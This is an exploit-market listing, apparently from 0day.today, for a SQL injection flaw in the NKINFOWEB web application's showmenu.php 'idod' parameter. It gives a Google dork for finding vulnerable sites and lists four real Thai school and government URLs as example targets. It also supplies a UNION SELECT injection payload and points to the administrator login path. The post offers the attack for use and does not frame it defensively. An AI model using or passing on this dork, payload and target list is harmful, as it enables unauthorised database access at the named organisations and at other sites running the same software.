[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NKINFOWEB - SQL Injection Vulnerability

Author
ShinoBi-Dz
Risk
[
Security Risk High
]
0day-ID
0day-ID-19221
Category
web applications
Date add
20-08-2012
Platform
php
#########################################################################
# Exploit Title: [ NKINFOWEB - SQL Injection Vulnerability ]                 
# Date: [20-08-2012]                                                    
# Author: [ShinoBi-Dz]
# E-mail : ShinoBiDz442@gmail.com                                       
# Facebook : https://www.facebook.com/shinobi.DZz                      
# Category: [webapps]                                                    
# Google dork: powered by nkinfoweb showmenu.php?idod=  
# Tested on: [Windows 7 ]                                               
#########################################################################

Example Sites : 

http://www.skprivate.go.th/home/showmenu.php?idod=37'
http://www.suntisuk.ac.th/showmenu.php?idod=14'
http://www.bwps.ac.th/showmenu.php?idod=48'
http://www.rongkwangnfe.net/huawrong/showmenu.php?idod=21'


and more in Google


[~]Exploit/p0c : http://www.site.com/showmenu.php?idod=-[] union select 1,2,3,4,5,6,7--
 Page admin: 
http://www.site.com/administrator


Greetz [ Arm4dill0.DZ - Mouh Marvel - ALL ALG HachEr ] 

                        -[Freedom to Palestine]-



#  0day.today [2024-11-15]  #